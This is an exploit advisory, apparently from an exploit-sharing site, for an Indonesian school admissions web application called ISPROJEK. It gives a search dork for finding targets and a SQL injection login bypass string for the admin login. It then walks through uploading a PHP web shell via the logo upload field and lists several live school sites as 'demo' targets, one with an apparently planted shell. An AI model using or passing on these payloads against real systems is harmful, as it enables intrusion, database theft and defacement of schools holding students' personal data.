[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: intext:"ISPROJEK"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find website with the dork
Login url will be site.sch.id/path/login.php
Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
You can upload your file via
1. Click Setting or you can paste the link /index.php?p=f_editadmin
2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1
3. Fill all the form, then upload your Shell (php extension) in the "File Logo"
Your files will go to site.sch.id/path/images/logo/yourshell.php
example:
https://aplikasi-cbt.com/ppdb/images/logo/captcha.php
NB:
- filetype of this uploader is php
- Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data
Demo sites:
https://aplikasi-cbt.com/ppdb/login.php
https://ma-arrosyidiyah.sch.id/ppdb/login.php
https://mtsyppsbandung.com/ppdb/login.php
https://masirnamiskin.com/ppdb/login.php